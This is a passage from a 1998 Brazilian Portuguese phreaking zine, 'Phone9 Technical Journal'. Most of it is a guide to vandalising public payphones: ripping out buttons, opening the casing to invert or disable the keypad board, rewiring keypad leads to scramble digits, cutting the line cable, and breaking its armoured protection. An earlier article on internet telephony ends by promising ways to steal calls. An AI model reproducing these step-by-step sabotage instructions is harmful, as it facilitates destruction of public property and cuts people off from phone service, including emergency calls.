(g) Manter uma conexao Full-duplex, e com troca de informacao ao vivo e a 
sistema digital via internet
(h) Manter a informacao trocada em um diretorio separado do servidor
(i) Nao derrubar ligacao quando nenhuma ou pouca data/voz for transmitida!
(j) Monitorar a data/voz transmitada e informacao sobre a conta do usuario

4.1) Diretorio remoto
	
	A grande filosofia do inetphone, eh diminuir o custo da ligacao a 
ditancia, para duas ligacao locais feitas pelas internet. De qualquer modo
o servidor inetphone , precisa de saber o IP e o telefone da pessoa, 
incluindo codigo do pais, codigo da cidade, central e terminal telefonica,
exemplo: 55-021-234-5678! Para poder suportar a configuracao dinamica do 
inetphone, um diretorio remoto (directory Servers - DS)sera pedido entre o 
IP e o codigo de area do Inetphone. Depois q um servidor inetphone se 
instala na inet, eh necessario q ele se registre como um servidor DS (DR?),
o DS de cada servidor q suporta inetphone, sera espcionado a procura de um
DS , dentro do DS, ele sera possivel achar informacoes  sobre quem quer 
originar a ligacao.

5) Conclusao

	Proxima semana, eu trago alguns meios q eu descobrir e achar , sobre
como entender melhor e/ou roubar ligacoes destes aparelhos!
	Thanx to: Acid Branch & SlackWarez (LOP?)

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Phone Phucker Philes ........................: The Phone9 demon cast <:]

Lembre-se, o q nos ensinamos trata exatamente de pura sacanagem com 
telefones publicos , privados e celulares, entre outros, se vc nao gosta nao
leia, se ler fa'ca , e toda esta merda burocratica q vai pro inferno!

"Just because you're not a paranoid, doesn't mean that you're not being 
followed" - kurt d. Cobain!


(1)			==========================					 (1)
			+-- Phudendo telefones --+
			+------- publicos -------+
			==========================

	Bem vindo a nossa Telefone Phuck Philes, para mais um guia da Phone9,
desta vez, um guia completo , dividido em duas partes sobre maneiras 
praticas e teoricas de como se destruir um telefone publico , criado por
varios membros da phone9, juntando anos de esperiencia de vandalismo mutuo a
telefones publicos, qualquer pessoa q se sinta ofendido com o uso das 
informacoes aqui contidas, vai se phuder e para de ler a porra da zine, bah!

Destruindo os botoes - by SlackWarez
---------- -- ------   -- ----------

	Esta tecnica eu usei na minha cidade natal , um dia , eu e meus 
amigos, resolvemos fazer alguma coisa bastante estupida , entao eu fui ateh
o telefone publico e comecei a arrancar os botoes do teclado! Faca isto com
facas, facoes, tesouras, lapis, caneta, pedra, pedaco de pau, e outros...!

Mudando a correpondencia do teclado - by The blood root
------- - -------------- -- -------   -- --- ----- ----

	esta na minha opniao eh muito legal, jah pensou, vc sai correndo ateh
um telefone, e quando chega para discar 2345678, o 2 corresponde ao 8 e o
5 ao 9 , e assim por diante. A tecnica eh bastante forcada, mas da para se
divertir enquantoa faz!

	Material:
	Chave de fenda triangular (daquelas q cabem para abrir a parte 
					   blindada do telefone! A parte de fora do 
                                 telefone)
	
	Procedimento:
	Retire a tampa do telefone, depois de fazer isto, vc vera o circuito
todo do telefone, procure o teclado do telefone, normalmente, ele soh esta 
preso por duas astes q vc tira com um peteleco, pegue a placa, lembre-se ,
nao sao os botoes e sim a placa (cuidado para nao quebrar nenhum botao), 
e vire a placa de cabeca para baixo, depois de fazer isto, reprenda-o os
botoes no teclado e pronto, o telefone jah esta totalmente pirado!

Deshabilitando o teclado - by The blood root
-------------- - -------   -- --- ----- ----

	Faca a mesma coisa q o esquema acima, mas ao invez de vira-lo de 
cabeca para baixo, vire para o outro lado, onde nao existe circuito na placa
assim qualquer aperto no teclado sera sem sentido e sem resposta!

Tirando a linha do telefone - by The dert e The blood root
------- - ----- -- --------   -- --- ---- - --- ----- ----

	Esta nos fizemos em um telefone perto da padaria daqui de casa, heheh!
Desculpe telerj? Nao..... De qquer modo, atras dos telefones publicos, 
existe um fio , na maioria das vezes blindado, mas em alguns casos, de um 
borracha cortavel com uma tesoura poderosa, e foi isto o q eu fiz, peguei um
tesourao de podar galhos de arvores, e cortei o fio, na mesma hora o 
telefone fica sem linha!

Mudando a correspondencia do teclado (ii) - by The blood root
------- - --------------- -- ------- ----   -- --- ----- ----

	Esta eh um complemento a outra tecnica, a de mudar a correspondencia,
ao ensinar este ato a um amigo meu (Assassin-X), ele obteve serios problemas
entao eu fiz outro sistema! Quando vc abrir o teclado, vc vera uma 
imensidade de fios coloridos q sao:

- cinza
- roxo
- azul
- verde
- amarelo
- laranja
- vermelho
- marrom

	Esta sao as cores de cada fio saindo do teclado, para mudar a 
correspondencia, basta cortar um fio e solda-lo a outro lugar da placa, 
onde jah existe um fio , dai fac'a as seguintes combinacoes!

Vermelho pelo laranja
=========
= 1 4 7 =
= 2 5 8 =
=========

roxo pelo laranja
=========
= 0 # * =
= 2 5 8 =
=========

	Nos , ou pelo menos eu , soh testei estas duas combinacoes, pois o 
telefone q eu uso para estudos utiliza um circuito muito pouco detalhado e 
pouco organizado, soh consegui estas, quem conseguir mais combinacoes por 
favor mandem para nos!;)
 
maneiras de como se arrombar a protecao blindada dos fios - The blood root
-------- -- ---- -- -------- - -------- -------- --- ----   --- ----- ----

	Segundo pesquisas do nosso FSBS (Fucking Stupid Bull Shit) , nos 
chegamos a conclusao de q o mundo vai acabar no ano 2000, mas nos tbm 
chegamos a conclusao de q o maior problema dos supostos phreakers, eh: 
conseguir arrancar a protecao blindada do fio telefonico, sem danificar o 
fio ou qquer parte do telefone, alem da protecao blindada!

(1) Como sugere Tom Waits (tom.waits@usa.net), com um simples gancho eh 
possivel se arrombar uma daquelas protecoes blindadas escretas nos 
telefones! O modo de se colocar o gancho, eh bem simples, voce deve colocar 
o gancho apoiadfo sobre uma base solida, colocar o gancho preso na 
extremidade final do fio (do telefone para o poste) e depois comecar a puxar
o gancho de dentro para fora, com o intuito de arrebentar a solda q prende o
gancho de forma mais ou menos inquebravel!

(2) Este eh o metodo mais simples e melhor para se usar em casos de protecao
blindada. Procure a saida do fio do telefone, geralmente ele sai em um fio 
protegido por uma borracha preta em um poste, achado este, tente retirar 
esta borracha ou corta-la, depois disso, voce tera os fios magicos soh para
voce!

Estudo do CHIP - by The Phone9
------ -- ----   -- --- ------

	Por enquanto nos nao temos nada a declarar a nao ser q nos , estamos 
comecando a estudar as originalidades e funcoes dos chips de telefone 
publicos da telebras e da ERICSSON, os mais usados no brasil.
	Depois disto, fica por conta da gente informar os resultados, talvez 
na proxima edicao!

[ALVo Do NoSSo PRoXiMo PHoNE PHUCKER PHiLES: cAIXAS De VERiFCACAO]
[------------------//> eND Of tRANSMISSION <\\-------------------]

[disclamer: Vao se phuder todo mundo, voces e suas politicas capitalistas]
[de um mundo melhor, pelo menos deixe-nos expressar da forma mais certa  ]
[no q nos mais nos empenhamos, procure nos entender e nao nos odiar, nao ]
[adianta tanta rebeliao, desde de q a carne eh soh a alma do pacado, o q ]
[nos realmente precisamos de voces eh de uma boa dose de uisque, um pouco] 
[de musica techno e nossas maquinas , sem nenhum burrocrata baixinho para]
[nos enxer o saco..... Qualquer reclamacao quanto as informacoes aqui con]
[tidas, por favor mande um mail para phone9@thepentagon.com. Ass.: Deus  ]
[-------------------------//> b0W Da Wor1d <\\---------------------------]

The Phone Phucker Philes
(c) - 1998, The Phone9 Technical Journal
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> D-END ......................................... Die Phone9 Anarkisty <:]

bom , eu acho q eh isto, chegamos ao final da primeira edicao da phone9 
techinakal journal, espero q o pessoal tenha gostado, e q escreva para
mandar agradecimentos e artigos, para entrar em contato conosco:

The blood root -  (blood@microsoftz.com)
acid branch    -  enquanto ainda nao providenciamos um mail para ele, pode
                  enviar as perguntas para phone9@thepentagon.com
The dert       -  (dert@microsoftz.com)
Primal Phear   -  (primal.phr@hotmail.com)

Eh o mail principal da zine, phone9@thepentagon.com.....

Agradecemos a tudo e a todos, 

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM

		~~~>>>>>>>[ WANTED - LIVE oR DeAD ]<<<<<<<~~~
				[ US$1.000.000.000. ]

		 /~\\                //~\   .---.   '\'\   ,---.
 		|  \\              //  |   |   \\  l\\l_ //    |
 		[   ||            ||   ]   |    \\/'/   `.|    |
           ] Y  ||            ||  Y [  | Y  |   |    ||  Y |
           |  \_|l,----------.l|_/  |  |  \ |   |    ||\/  /
           |   >'              `<   |  \    \| o|o   ||>  /
           \    (/~`--____--'~\)   /    \____\_--_ /_/__/
            `-_> -____________- <_-'    /.-\  (___)  /-.\
                 / (_#(__)#_) \         `---(_______)---'
                 \____/__\____/		     U  U
                      `--'
			  CeREBRo.                   PiNK

     Eles sao pequenos.... eles sao malvados.... eles adoram phone9.... 
[Sem mestres... Sem hackers... Sem aliens.... e Sem ratinhos de laboratorio]
pHon3 9 - mmm.puruca.c0m.b4/phone9